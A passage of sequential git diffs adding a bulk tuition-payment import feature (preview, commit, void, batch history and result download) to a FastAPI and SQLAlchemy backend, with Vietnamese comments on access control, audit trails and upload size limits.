+        Integer, ForeignKey("user.id", ondelete="SET NULL"), nullable=True, index=True,
+        comment="Kế toán import (maker)",
+    )
+    created_at: Mapped[datetime] = mapped_column(
+        DateTime(timezone=True), nullable=False,
+        default=lambda: datetime.now(timezone.utc),
+    )
+    committed_at: Mapped[Optional[datetime]] = mapped_column(
+        DateTime(timezone=True), nullable=True)
+    voided_at: Mapped[Optional[datetime]] = mapped_column(
+        DateTime(timezone=True), nullable=True)
+    void_reason: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
+
+    rows: Mapped[List["PaymentImportRow"]] = relationship(
+        "PaymentImportRow", back_populates="batch",
+        cascade="all, delete-orphan", lazy="selectin",
+    )
+    created_by: Mapped[Optional["User"]] = relationship("User")
+
+    def __repr__(self) -> str:
+        return (
+            f"<PaymentImportBatch {self.id}: {self.status} "
+            f"HK{self.semester_no}/{self.academic_year} rows={self.row_count}>"
+        )
+
+
+class PaymentImportRow(Base):
+    """Một dòng của batch — audit + truy vết dòng → Payment đã tạo.
+
+    ``raw`` giữ dữ liệu gốc của dòng (JSONB) để đối soát. ``payment_ids`` lưu các
+    Payment auto-verify sinh ra (1 dòng có thể → N Payment khi phân bổ nhiều đợt),
+    phục vụ void/đảo.
+    """
+    __tablename__ = "payment_import_row"
+    __table_args__ = (
+        CheckConstraint(
+            "status IN ('matched', 'warned', 'error')",
+            name="chk_payment_import_row_status",
+        ),
+    )
+
+    id: Mapped[int] = mapped_column(Integer, primary_key=True)
+    batch_id: Mapped[int] = mapped_column(
+        Integer, ForeignKey("payment_import_batch.id", ondelete="CASCADE"),
+        nullable=False, index=True,
+    )
+    row_no: Mapped[int] = mapped_column(Integer, nullable=False)
+
+    citizen_id: Mapped[Optional[str]] = mapped_column(String(12), nullable=True)
+    raw: Mapped[dict] = mapped_column(JSONB, nullable=False, default=dict)
+
+    # Audit snapshot (plain int, không FK — giữ id kể cả khi hồ sơ đổi)
+    resolved_profile_id: Mapped[Optional[int]] = mapped_column(Integer, nullable=True)
+    resolved_fee_id: Mapped[Optional[int]] = mapped_column(Integer, nullable=True)
+
+    status: Mapped[str] = mapped_column(String(12), nullable=False)
+    message: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
+    amount: Mapped[Optional[Decimal]] = mapped_column(Numeric(15, 2), nullable=True)
+    payment_ids: Mapped[Optional[list]] = mapped_column(JSONB, nullable=True)
+
+    batch: Mapped["PaymentImportBatch"] = relationship(
+        "PaymentImportBatch", back_populates="rows",
+    )
+
+    def __repr__(self) -> str:
+        return f"<PaymentImportRow b{self.batch_id}#{self.row_no}: {self.status}>"

--- a/Backend_FastAPI/app/models/finance/payment_import.py
+++ b/Backend_FastAPI/app/models/finance/payment_import.py
@@ -37,7 +37,7 @@ class PaymentImportBatchStatusEnum(str, enum.Enum):
 class PaymentImportRowStatusEnum(str, enum.Enum):
     """Per-row outcome of resolve/validate."""
     matched = "matched"        # ghi được (có thể kèm warning)
-    warned = "warned"          # ghi được + cảnh báo (lệch tên / tràn nhiều đợt / nghi trùng)
+    warned = "warned"          # ghi được + cảnh báo (lệch tên/tràn đợt/nghi trùng)
     error = "error"            # KHÔNG ghi (không khớp / vượt tổng / sai định dạng)
 
 
@@ -141,7 +141,9 @@ class PaymentImportRow(Base):
             name="chk_payment_import_row_status",
         ),
         # Chống trùng dòng (parser chạy lại/bug) → void & đối soát theo row_no rõ ràng.
-        UniqueConstraint("batch_id", "row_no", name="uq_payment_import_row_batch_rowno"),
+        UniqueConstraint(
+            "batch_id", "row_no", name="uq_payment_import_row_batch_rowno"
+        ),
     )
 
     id: Mapped[int] = mapped_column(Integer, primary_key=True)

--- a/Backend_FastAPI/app/routers/payments.py
+++ b/Backend_FastAPI/app/routers/payments.py
@@ -895,9 +895,89 @@ async def list_payment_import_batches(
     )
 
 
+# Route-order: ĐẶT SAU "/import/batches" (tĩnh) + dùng đường con "/batches/{id}" để
+# KHÔNG nuốt route danh sách. (Bare "/import/{batch_id}" sẽ khớp "batches"→ép int→422.)
+@limiter.limit(RateLimits.DATA_READ)
+@router.get(
+    "/import/batches/{batch_id}",
+    response_model=finance_schemas.PaymentImportBatchDetailOut,
+    summary="Chi tiết lô import — xem lại từng dòng sau commit (BV-5 R2)",
+)
+async def get_payment_import_batch_detail(
+    request: Request,
+    batch_id: int,
+    db: AsyncSession = Depends(database.get_db),
+    current_user: models.User = CasbinAuth,
+    _finance_staff: models.User = Depends(require_finance_staff),
+):
+    """Lô + per-row (status / lý do / payment_ids) để truy vết. IDOR unit-scope → 404."""
+    unit_id = finance_scope_unit_id(current_user)
+    try:
+        batch, rows = await payment_import_service.get_batch_detail_scoped(
+            db, batch_id, unit_id
+        )
+    except ResourceNotFoundError as e:
+        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=str(e))
+    # KHÔNG model_validate(batch) trực tiếp vào DetailOut: field `rows` + from_attributes
+    # → Pydantic đọc batch.rows (relationship LAZY, chưa load) → MissingGreenlet (async IO
+    # ngoài greenlet) → 500. Build từ summary (chỉ cột) + rows đã nạp riêng.
+    summary = finance_schemas.PaymentImportBatchSummaryOut.model_validate(batch)
+    summary.can_void = (
+        current_user.role in (UserRole.MANAGER, UserRole.ADMIN)
+        and batch.status == "committed"
+    )
+    return finance_schemas.PaymentImportBatchDetailOut(
+        **summary.model_dump(),
+        rows=[_payment_import_row_out(r) for r in rows],
+    )
+
+
+@limiter.limit(RateLimits.DATA_READ)
+@router.get(
+    "/import/batches/{batch_id}/result",
+    summary="Tải file kết quả import (nguyên dòng gốc + Trạng thái/Lý do) (BV-5 R1)",
+)
+async def download_payment_import_result(
+    request: Request,
+    batch_id: int,
+    format: str = Query("xlsx", pattern="^(xlsx|csv)$"),
+    db: AsyncSession = Depends(database.get_db),
+    current_user: models.User = CasbinAuth,
+    _finance_staff: models.User = Depends(require_finance_staff),
+):
+    """File kết quả = nguyên dòng gốc + cột kết quả (sanitize chống formula injection).
+    IDOR unit-scope. Sinh ở service; router chỉ stream (CLAUDE.md rule 1)."""
+    unit_id = finance_scope_unit_id(current_user)
+    try:
+        content, media_type, filename = await payment_import_service.build_result_file(
+            db, batch_id, format, unit_id
+        )
+    except ResourceNotFoundError as e:
+        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=str(e))
+    return StreamingResponse(
+        io.BytesIO(content),
+        media_type=media_type,
+        headers={"Content-Disposition": f'attachment; filename="{filename}"'},
+    )
+
+
 # ==============================================================================
 # HELPER FUNCTIONS
 # ==============================================================================
+
+def _payment_import_row_out(r) -> finance_schemas.PaymentImportRowOut:
+    """Map 1 ``PaymentImportRow`` ORM → schema (dùng chung commit + detail BV-5)."""
+    return finance_schemas.PaymentImportRowOut(
+        row_no=r.row_no,
+        status=r.status,
+        message=r.message,
+        citizen_id=r.citizen_id,
+        profile_id=r.resolved_profile_id,
+        fee_id=r.resolved_fee_id,
+        amount=r.amount,
+        payment_ids=r.payment_ids,
+    )
+
 
 def _build_payment_import_commit(
     result, batch, rows
@@ -910,19 +990,7 @@ def _build_payment_import_commit(
         failed_count=result.failed_count,
         payment_count=result.payment_count,
         total_amount=result.total_amount,
-        rows=[
-            finance_schemas.PaymentImportRowOut(
-                row_no=r.row_no,
-                status=r.status,
-                message=r.message,
-                citizen_id=r.citizen_id,
-                profile_id=r.resolved_profile_id,
-                fee_id=r.resolved_fee_id,
-                amount=r.amount,
-                payment_ids=r.payment_ids,
-            )
-            for r in rows
-        ],
+        rows=[_payment_import_row_out(r) for r in rows],
     )
 
 

--- a/Backend_FastAPI/app/routers/payments.py
+++ b/Backend_FastAPI/app/routers/payments.py
@@ -879,11 +879,16 @@ async def list_payment_import_batches(
     items, total = await payment_import_service.list_batches(
         db, unit_id=unit_id, skip=skip, limit=page_size
     )
+    # can_void = quyền THẬT của người xem (khớp gate require_admin_or_manager của route
+    # void) → FE đọc flag, KHÔNG tự check role. Chỉ lô 'committed' mới đảo được.
+    can_void_role = current_user.role in (UserRole.MANAGER, UserRole.ADMIN)
+    items_out = []
+    for b in items:
+        summary = finance_schemas.PaymentImportBatchSummaryOut.model_validate(b)
+        summary.can_void = can_void_role and b.status == "committed"
+        items_out.append(summary)
     return finance_schemas.PaymentImportBatchListOut(
-        items=[
-            finance_schemas.PaymentImportBatchSummaryOut.model_validate(b)
-            for b in items
-        ],
+        items=items_out,
         total=total,
         page=page,
         page_size=page_size,

--- a/Backend_FastAPI/app/routers/payments.py
+++ b/Backend_FastAPI/app/routers/payments.py
@@ -21,26 +21,33 @@ Payment Flows:
    - POST /api/payments/callback/{gateway} - Gateway callback (IPN)
 """
 
+import io
 from datetime import datetime, timezone
 from decimal import Decimal
 from typing import Dict, Any, List, Optional
-from fastapi import APIRouter, Depends, HTTPException, Query, Request, status
+from fastapi import (
+    APIRouter, Depends, File, Form, HTTPException, Query, Request, UploadFile,
+    status,
+)
+from fastapi.responses import StreamingResponse
 from sqlalchemy.ext.asyncio import AsyncSession
 import structlog
 
 from app import database, models, schemas
 from app.core import deps
 from app.core.constants import UserRole
-from app.core.deps import CasbinAuth, finance_scope_unit_id
+from app.core.deps import CasbinAuth, finance_scope_unit_id, require_finance_staff
 from app.core.rate_limits import limiter, RateLimits
 from app.schemas import finance as finance_schemas
 from app.services.payment_service import PaymentService
 from app.services.payment_intent_service import PaymentIntentService
+from app.services import payment_import_service
 from app.repositories.payment_repository import PaymentRepository
 from app.utils.exceptions import (
     ResourceNotFoundError,
     BadRequest,
     BusinessRuleViolation,
+    ConflictError,
 )
 
 log = structlog.get_logger(__name__)
@@ -637,8 +644,155 @@ async def payment_callback(
 
 
 # ==============================================================================
+# BULK PAYMENT IMPORT (auto-verify) — BV-2: template + preview (read-only)
+# ==============================================================================
+
+# Giới hạn kích thước file import (chống nuốt RAM / DoS); 5000 dòng × vài cột.
+_MAX_IMPORT_FILE_BYTES = 8 * 1024 * 1024  # 8 MB
+
+
+@limiter.limit(RateLimits.DATA_READ)
+@router.get(
+    "/import/template",
+    summary="Tải file mẫu import thu học phí hàng loạt",
+)
+async def download_payment_import_template(
+    request: Request,
+    format: str = Query("xlsx", description="Định dạng: xlsx (khuyến nghị) hoặc csv"),
+    current_user: models.User = CasbinAuth,
+    _finance_staff: models.User = Depends(require_finance_staff),
+):
+    """File mẫu để kế toán điền số tiền đã thu offline → import tự xác minh.
+
+    Cấp batch (chọn khi import, KHÔNG có trong file): **Năm học + Học kỳ**.
+    Cột: Số CCCD · Họ và tên · Số tiền thu (VNĐ) · Ngày thu (dd/mm/yyyy) · Hình thức
+    (TM/CK) · Mã tham chiếu (tùy chọn) · Ghi chú (tùy chọn). Cột CCCD + Mã tham chiếu
+    định dạng TEXT để giữ số 0 đầu. Gate: Casbin (route grant) + finance staff.
+
+    Sinh file ở service (``build_template``) — router chỉ stream (CLAUDE.md rule 1).
+    """
+    content, media_type, filename = payment_import_service.build_template(format)
+    return StreamingResponse(
+        io.BytesIO(content),
+        media_type=media_type,
+        headers={"Content-Disposition": f'attachment; filename="{filename}"'},
+    )
+
+
+@limiter.limit(RateLimits.DATA_WRITE)
+@router.post(
+    "/import/preview",
+    response_model=finance_schemas.PaymentImportPreviewOut,
+    summary="Xem trước (dry-run) import thu học phí hàng loạt — KHÔNG ghi tiền",
+)
+async def preview_payment_import(
+    request: Request,
+    file: UploadFile = File(..., description="File .xlsx/.csv theo mẫu"),
+    academic_year: int = Form(
+        ..., ge=2020, le=2100, description="Năm học (cấp batch)"
+    ),
+    semester_no: int = Form(
+        ..., ge=1, le=12, description="Học kỳ (cấp batch, 1..12)"
+    ),
+    db: AsyncSession = Depends(database.get_db),
+    current_user: models.User = CasbinAuth,
+    _finance_staff: models.User = Depends(require_finance_staff),
+):
+    """Pha 1: đối chiếu từng dòng (CCCD → hồ sơ → học phí → đợt FIFO) READ-ONLY.
+
+    Tạo 1 lô ``preview`` (chống re-import qua file_sha256) và trả về phân loại
+    MATCHED / WARNING / ERROR + phân bổ FIFO dự kiến. **KHÔNG** tạo/ghi Payment —
+    việc ghi tiền nằm ở pha commit (BV-3).
+    """
+    content = await file.read()
+    if not content:
+        raise HTTPException(
+            status_code=status.HTTP_400_BAD_REQUEST, detail="File rỗng."
+        )
+    if len(content) > _MAX_IMPORT_FILE_BYTES:
+        raise HTTPException(
+            status_code=status.HTTP_400_BAD_REQUEST,
+            detail=f"File vượt giới hạn {_MAX_IMPORT_FILE_BYTES // (1024 * 1024)}MB.",
+        )
+
+    unit_id = finance_scope_unit_id(current_user)
+    try:
+        batch, preview = await payment_import_service.preview_import(
+            db,
+            content=content,
+            filename=file.filename or "import.xlsx",
+            academic_year=academic_year,
+            semester_no=semester_no,
+            created_by_id=current_user.id,
+            unit_id=unit_id,
+        )
+        await db.commit()
+    except ConflictError as e:
+        raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail=str(e))
+    except BadRequest as e:
+        raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=str(e))
+
+    log.info(
+        "payment_import_preview",
+        batch_id=batch.id,
+        academic_year=academic_year,
+        semester_no=semester_no,
+        matched=batch.matched_count,
+        warned=batch.warned_count,
+        failed=batch.failed_count,
+        user_id=current_user.id,
+    )
+    return _build_payment_import_preview(batch, preview)
+
+
+# ==============================================================================
 # HELPER FUNCTIONS
 # ==============================================================================
+
+def _build_payment_import_preview(
+    batch, preview,
+) -> finance_schemas.PaymentImportPreviewOut:
+    """Map ``(PaymentImportBatch, PreviewResult)`` → schema response của pha preview.
+
+    Phân bổ FIFO dự kiến (``allocations``) chỉ có trong ``preview`` in-memory (KHÔNG
+    persist vào row) nên build từ ``preview.rows`` thay vì từ ORM rows.
+    """
+    return finance_schemas.PaymentImportPreviewOut(
+        batch_id=batch.id,
+        academic_year=batch.academic_year,
+        semester_no=batch.semester_no,
+        file_name=batch.file_name,
+        status=batch.status,
+        row_count=batch.row_count,
+        matched_count=batch.matched_count,
+        warned_count=batch.warned_count,
+        failed_count=batch.failed_count,
+        total_amount=batch.total_amount,
+        rows=[
+            finance_schemas.PaymentImportRowOut(
+                row_no=r.row_no,
+                status=r.status,
+                message=r.message,
+                citizen_id=r.citizen_id,
+                profile_id=r.profile_id,
+                fee_id=r.fee_id,
+                amount=r.amount,
+                method_code=r.method_code,
+                payment_date=r.payment_date,
+                reference=r.reference,
+                allocations=[
+                    finance_schemas.PaymentImportAllocationOut(
+                        invoice_id=a.invoice_id,
+                        installment_no=a.installment_no,
+                        amount=a.amount,
+                    )
+                    for a in r.allocations
+                ],
+            )
+            for r in preview.rows
+        ],
+    )
+
 
 def _compute_payment_review_flags(
     payment, current_user_id: Optional[int], current_user_role: str

--- a/Backend_FastAPI/app/routers/payments.py
+++ b/Backend_FastAPI/app/routers/payments.py
@@ -881,11 +881,10 @@ async def list_payment_import_batches(
     )
     # can_void = quyền THẬT của người xem (khớp gate require_admin_or_manager của route
     # void) → FE đọc flag, KHÔNG tự check role. Chỉ lô 'committed' mới đảo được.
-    can_void_role = current_user.role in (UserRole.MANAGER, UserRole.ADMIN)
     items_out = []
     for b in items:
         summary = finance_schemas.PaymentImportBatchSummaryOut.model_validate(b)
-        summary.can_void = can_void_role and b.status == "committed"
+        summary.can_void = _can_void_for(current_user, b.status)
         items_out.append(summary)
     return finance_schemas.PaymentImportBatchListOut(
         items=items_out,
@@ -922,10 +921,7 @@ async def get_payment_import_batch_detail(
     # → Pydantic đọc batch.rows (relationship LAZY, chưa load) → MissingGreenlet (async IO
     # ngoài greenlet) → 500. Build từ summary (chỉ cột) + rows đã nạp riêng.
     summary = finance_schemas.PaymentImportBatchSummaryOut.model_validate(batch)
-    summary.can_void = (
-        current_user.role in (UserRole.MANAGER, UserRole.ADMIN)
-        and batch.status == "committed"
-    )
+    summary.can_void = _can_void_for(current_user, batch.status)
     return finance_schemas.PaymentImportBatchDetailOut(
         **summary.model_dump(),
         rows=[_payment_import_row_out(r) for r in rows],
@@ -964,6 +960,12 @@ async def download_payment_import_result(
 # ==============================================================================
 # HELPER FUNCTIONS
 # ==============================================================================
+
+def _can_void_for(user: models.User, batch_status: str) -> bool:
+    """Quyền đảo lô của user xem: manager/admin & lô 'committed' (khớp gate route void).
+    Dùng chung list + detail (1 nguồn — tránh lệch nếu đổi điều kiện)."""
+    return user.role in (UserRole.MANAGER, UserRole.ADMIN) and batch_status == "committed"
+
 
 def _payment_import_row_out(r) -> finance_schemas.PaymentImportRowOut:
     """Map 1 ``PaymentImportRow`` ORM → schema (dùng chung commit + detail BV-5)."""

--- a/Backend_FastAPI/app/routers/payments.py
+++ b/Backend_FastAPI/app/routers/payments.py
@@ -704,15 +704,22 @@ async def preview_payment_import(
     MATCHED / WARNING / ERROR + phân bổ FIFO dự kiến. **KHÔNG** tạo/ghi Payment —
     việc ghi tiền nằm ở pha commit (BV-3).
     """
-    content = await file.read()
-    if not content:
+    # Chống DoS nuốt RAM: kiểm content-length TRƯỚC, rồi đọc CÓ GIỚI HẠN (max+1 byte)
+    # để 1 upload khổng lồ không bị đọc trọn vào RAM trước khi tới chỗ check size.
+    if file.size is not None and file.size > _MAX_IMPORT_FILE_BYTES:
         raise HTTPException(
-            status_code=status.HTTP_400_BAD_REQUEST, detail="File rỗng."
+            status_code=status.HTTP_400_BAD_REQUEST,
+            detail=f"File vượt giới hạn {_MAX_IMPORT_FILE_BYTES // (1024 * 1024)}MB.",
         )
+    content = await file.read(_MAX_IMPORT_FILE_BYTES + 1)
     if len(content) > _MAX_IMPORT_FILE_BYTES:
         raise HTTPException(
             status_code=status.HTTP_400_BAD_REQUEST,
             detail=f"File vượt giới hạn {_MAX_IMPORT_FILE_BYTES // (1024 * 1024)}MB.",
+        )
+    if not content:
+        raise HTTPException(
+            status_code=status.HTTP_400_BAD_REQUEST, detail="File rỗng."
         )
 
     unit_id = finance_scope_unit_id(current_user)
@@ -745,9 +752,112 @@ async def preview_payment_import(
     return _build_payment_import_preview(batch, preview)
 
 
+@limiter.limit(RateLimits.DATA_WRITE)
+@router.post(
+    "/import/{batch_id}/commit",
+    response_model=finance_schemas.PaymentImportCommitOut,
+    summary="Ghi tiền (auto-verify) các dòng MATCHED/WARNING của lô import",
+)
+async def commit_payment_import(
+    request: Request,
+    batch_id: int,
+    db: AsyncSession = Depends(database.get_db),
+    current_user: models.User = CasbinAuth,
+    _finance_staff: models.User = Depends(require_finance_staff),
+):
+    """Pha 2: re-validate TOCTOU dưới khóa + auto-verify từng dòng (kế toán=maker,
+    system_user=checker) + gộp lead-sync. Lô đã committed → 409 (không ghi lại).
+    """
+    unit_id = finance_scope_unit_id(current_user)
+    try:
+        result, callback = await payment_import_service.commit_batch(
+            db, batch_id=batch_id, importer_id=current_user.id, unit_id=unit_id
+        )
+        await db.commit()
+        if callback:
+            await callback()
+    except ResourceNotFoundError as e:
+        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=str(e))
+    except ConflictError as e:
+        raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail=str(e))
+    except (BusinessRuleViolation, BadRequest) as e:
+        raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=str(e))
+
+    log.info(
+        "payment_import_commit",
+        batch_id=batch_id,
+        committed=result.committed_count,
+        failed=result.failed_count,
+        payments=result.payment_count,
+        total=str(result.total_amount),
+        user_id=current_user.id,
+    )
+    batch, rows = await payment_import_service.load_batch_with_rows(db, batch_id)
+    return _build_payment_import_commit(result, batch, rows)
+
+
+@limiter.limit(RateLimits.DATA_READ)
+@router.get(
+    "/import/batches",
+    response_model=finance_schemas.PaymentImportBatchListOut,
+    summary="Lịch sử lô import thu học phí (phân trang)",
+)
+async def list_payment_import_batches(
+    request: Request,
+    page: int = Query(1, ge=1),
+    page_size: int = Query(50, ge=1, le=100),
+    db: AsyncSession = Depends(database.get_db),
+    current_user: models.User = CasbinAuth,
+    _finance_staff: models.User = Depends(require_finance_staff),
+):
+    """Lịch sử lô import (mới nhất trước). Org-level finance info; tiền ghi ở mức
+    dòng đã unit-scope."""
+    unit_id = finance_scope_unit_id(current_user)
+    skip = (page - 1) * page_size
+    items, total = await payment_import_service.list_batches(
+        db, unit_id=unit_id, skip=skip, limit=page_size
+    )
+    return finance_schemas.PaymentImportBatchListOut(
+        items=[
+            finance_schemas.PaymentImportBatchSummaryOut.model_validate(b)
+            for b in items
+        ],
+        total=total,
+        page=page,
+        page_size=page_size,
+    )
+
+
 # ==============================================================================
 # HELPER FUNCTIONS
 # ==============================================================================
+
+def _build_payment_import_commit(
+    result, batch, rows
+) -> finance_schemas.PaymentImportCommitOut:
+    """Map ``(CommitResult, batch, rows ORM)`` → schema response pha commit."""
+    return finance_schemas.PaymentImportCommitOut(
+        batch_id=result.batch_id,
+        status=batch.status if batch is not None else "committed",
+        committed_count=result.committed_count,
+        failed_count=result.failed_count,
+        payment_count=result.payment_count,
+        total_amount=result.total_amount,
+        rows=[
+            finance_schemas.PaymentImportRowOut(
+                row_no=r.row_no,
+                status=r.status,
+                message=r.message,
+                citizen_id=r.citizen_id,
+                profile_id=r.resolved_profile_id,
+                fee_id=r.resolved_fee_id,
+                amount=r.amount,
+                payment_ids=r.payment_ids,
+            )
+            for r in rows
+        ],
+    )
+
 
 def _build_payment_import_preview(
     batch, preview,

--- a/Backend_FastAPI/app/routers/payments.py
+++ b/Backend_FastAPI/app/routers/payments.py
@@ -26,8 +26,8 @@ from datetime import datetime, timezone
 from decimal import Decimal
 from typing import Dict, Any, List, Optional
 from fastapi import (
-    APIRouter, Depends, File, Form, HTTPException, Query, Request, UploadFile,
-    status,
+    APIRouter, Body, Depends, File, Form, HTTPException, Query, Request,
+    UploadFile, status,
 )
 from fastapi.responses import StreamingResponse
 from sqlalchemy.ext.asyncio import AsyncSession
@@ -36,7 +36,12 @@ import structlog
 from app import database, models, schemas
 from app.core import deps
 from app.core.constants import UserRole
-from app.core.deps import CasbinAuth, finance_scope_unit_id, require_finance_staff
+from app.core.deps import (
+    CasbinAuth,
+    finance_scope_unit_id,
+    require_admin_or_manager,
+    require_finance_staff,
+)
 from app.core.rate_limits import limiter, RateLimits
 from app.schemas import finance as finance_schemas
 from app.services.payment_service import PaymentService
@@ -794,6 +799,63 @@ async def commit_payment_import(
     )
     batch, rows = await payment_import_service.load_batch_with_rows(db, batch_id)
     return _build_payment_import_commit(result, batch, rows)
+
+
+@limiter.limit(RateLimits.DATA_WRITE)
+@router.post(
+    "/import/{batch_id}/void",
+    response_model=finance_schemas.PaymentImportVoidOut,
+    summary="Đảo (void) lô import đã ghi tiền — rút lại toàn bộ Payment",
+)
+async def void_payment_import(
+    request: Request,
+    batch_id: int,
+    reason: str = Body(
+        ..., embed=True, min_length=3, max_length=500,
+        description="Lý do đảo lô (bắt buộc, lưu audit)",
+    ),
+    db: AsyncSession = Depends(database.get_db),
+    current_user: models.User = CasbinAuth,
+    _mgr: models.User = Depends(require_admin_or_manager),
+):
+    """Đảo lô đã committed: rút lại invoice/fee.paid_amount + Payment→refunded +
+    PaymentTransaction reversal; batch→void (mở lại file_sha256 để re-import). Gate
+    manager/admin (CAO HƠN finance staff — accountant KHÔNG được). Lô chưa committed
+    → 409.
+    """
+    unit_id = finance_scope_unit_id(current_user)
+    try:
+        result, callback = await payment_import_service.void_batch(
+            db,
+            batch_id=batch_id,
+            user_id=current_user.id,
+            unit_id=unit_id,
+            reason=reason,
+        )
+        await db.commit()
+        if callback:
+            await callback()
+    except ResourceNotFoundError as e:
+        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=str(e))
+    except ConflictError as e:
+        raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail=str(e))
+    except (BusinessRuleViolation, BadRequest) as e:
+        raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=str(e))
+
+    log.info(
+        "payment_import_void",
+        batch_id=batch_id,
+        reversed=result.reversed_count,
+        amount=str(result.reversed_amount),
+        user_id=current_user.id,
+    )
+    return finance_schemas.PaymentImportVoidOut(
+        batch_id=result.batch_id,
+        status="void",
+        reversed_count=result.reversed_count,
+        reversed_amount=result.reversed_amount,
+        void_reason=reason,
+    )
 
 
 @limiter.limit(RateLimits.DATA_READ)

--- a/Backend_FastAPI/app/schemas/finance.py
+++ b/Backend_FastAPI/app/schemas/finance.py
@@ -1189,3 +1189,8 @@ class PaymentImportBatchListOut(BaseModel):
     total: int
     page: int
     page_size: int
+
+
+class PaymentImportBatchDetailOut(PaymentImportBatchSummaryOut):
+    """Lô + chi tiết TỪNG DÒNG — xem lại per-row sau commit (BV-5 R2)."""
+    rows: List[PaymentImportRowOut] = Field(default_factory=list)

--- a/Backend_FastAPI/app/schemas/finance.py
+++ b/Backend_FastAPI/app/schemas/finance.py
@@ -1152,6 +1152,15 @@ class PaymentImportCommitOut(BaseModel):
     rows: List[PaymentImportRowOut] = Field(default_factory=list)
 
 
+class PaymentImportVoidOut(BaseModel):
+    """Phản hồi đảo (void) lô — ĐÃ rút lại tiền (BV-3.5)."""
+    batch_id: int
+    status: str  # void
+    reversed_count: int = Field(..., description="Số Payment đã đảo")
+    reversed_amount: Decimal = Field(..., description="Tổng tiền đã rút lại")
+    void_reason: Optional[str] = None
+
+
 class PaymentImportBatchSummaryOut(BaseModel):
     """1 dòng lịch sử lô import."""
     id: int

--- a/Backend_FastAPI/app/schemas/finance.py
+++ b/Backend_FastAPI/app/schemas/finance.py
@@ -1097,3 +1097,44 @@ class FinanceDashboardStats(BaseModel):
     pending_refunds_count: int = 0
 
     model_config = ConfigDict(from_attributes=True)
+
+
+# ==============================================================================
+# PAYMENT IMPORT (BULK VERIFY) SCHEMAS — BV-2
+# ==============================================================================
+
+class PaymentImportAllocationOut(BaseModel):
+    """Một phần phân bổ FIFO dự kiến của 1 dòng vào 1 đợt (invoice)."""
+    invoice_id: int
+    installment_no: int
+    amount: Decimal
+
+
+class PaymentImportRowOut(BaseModel):
+    """Kết quả đối chiếu 1 dòng file (preview)."""
+    row_no: int = Field(..., description="Số dòng trên bảng tính (header = dòng 1)")
+    status: str = Field(..., description="matched | warned | error")
+    message: Optional[str] = None
+    citizen_id: Optional[str] = None
+    profile_id: Optional[int] = None
+    fee_id: Optional[int] = None
+    amount: Optional[Decimal] = None
+    method_code: Optional[str] = None
+    payment_date: Optional[date] = None
+    reference: Optional[str] = None
+    allocations: List[PaymentImportAllocationOut] = Field(default_factory=list)
+
+
+class PaymentImportPreviewOut(BaseModel):
+    """Phản hồi pha 1 — preview (dry-run, CHƯA ghi tiền)."""
+    batch_id: int
+    academic_year: int
+    semester_no: int
+    file_name: str
+    status: str
+    row_count: int
+    matched_count: int
+    warned_count: int
+    failed_count: int
+    total_amount: Decimal
+    rows: List[PaymentImportRowOut] = Field(default_factory=list)

--- a/Backend_FastAPI/app/schemas/finance.py
+++ b/Backend_FastAPI/app/schemas/finance.py
@@ -1123,6 +1123,7 @@ class PaymentImportRowOut(BaseModel):
     payment_date: Optional[date] = None
     reference: Optional[str] = None
     allocations: List[PaymentImportAllocationOut] = Field(default_factory=list)
+    payment_ids: Optional[List[int]] = None  # populated sau commit (BV-3)
 
 
 class PaymentImportPreviewOut(BaseModel):
@@ -1138,3 +1139,41 @@ class PaymentImportPreviewOut(BaseModel):
     failed_count: int
     total_amount: Decimal
     rows: List[PaymentImportRowOut] = Field(default_factory=list)
+
+
+class PaymentImportCommitOut(BaseModel):
+    """Phản hồi pha 2 — commit (ĐÃ ghi tiền)."""
+    batch_id: int
+    status: str  # committed
+    committed_count: int
+    failed_count: int
+    payment_count: int
+    total_amount: Decimal
+    rows: List[PaymentImportRowOut] = Field(default_factory=list)
+
+
+class PaymentImportBatchSummaryOut(BaseModel):
+    """1 dòng lịch sử lô import."""
+    id: int
+    academic_year: int
+    semester_no: int
+    file_name: str
+    status: str  # preview | committed | void
+    row_count: int
+    matched_count: int
+    warned_count: int
+    failed_count: int
+    total_amount: Decimal
+    created_at: datetime
+    committed_at: Optional[datetime] = None
+    voided_at: Optional[datetime] = None
+
+    model_config = ConfigDict(from_attributes=True)
+
+
+class PaymentImportBatchListOut(BaseModel):
+    """Lịch sử lô import (phân trang)."""
+    items: List[PaymentImportBatchSummaryOut] = Field(default_factory=list)
+    total: int
+    page: int
+    page_size: int

--- a/Backend_FastAPI/app/schemas/finance.py
+++ b/Backend_FastAPI/app/schemas/finance.py
@@ -1176,6 +1176,9 @@ class PaymentImportBatchSummaryOut(BaseModel):
     created_at: datetime
     committed_at: Optional[datetime] = None
     voided_at: Optional[datetime] = None
+    # Quyền đảo lô của NGƯỜI ĐANG XEM (BE quyết theo role+status) → FE đọc flag thay
+    # vì tự check role (thin-client). True khi user là manager/admin & lô 'committed'.
+    can_void: bool = False
 
     model_config = ConfigDict(from_attributes=True)
 

--- a/Backend_FastAPI/app/services/lead_admission_sync.py
+++ b/Backend_FastAPI/app/services/lead_admission_sync.py
@@ -24,6 +24,7 @@ Usage:
 
 from typing import Optional
 import structlog
+from sqlalchemy import select
 from sqlalchemy.ext.asyncio import AsyncSession
 from sqlalchemy.orm import selectinload
 
@@ -637,6 +638,98 @@ async def sync_lead_tuition_paid(
         transaction_id=transaction_id,
     )
 
+    return True
+
+
+async def revert_lead_tuition_paid(
+    db: AsyncSession,
+    profile: models.AdmissionProfile,
+    changed_by_user_id: Optional[int] = None,
+    reason: Optional[str] = None,
+) -> bool:
+    """Đảo projection "HK1 đã đóng": đưa lead VỀ status TRƯỚC khi
+    ``sync_lead_tuition_paid`` đẩy lên sts10 (Đã hoàn tất học phí).
+
+    Dùng khi VOID (đảo) lô import đã ghi nhận học phí HK1 — đây là KẾ TOÁN SỬA
+    NHẦM ghi nhận, KHÔNG phải học sinh rút (luồng rút =
+    ``sync_lead_tuition_refunded`` → sts18). Đối xứng forward sync.
+
+    An toàn:
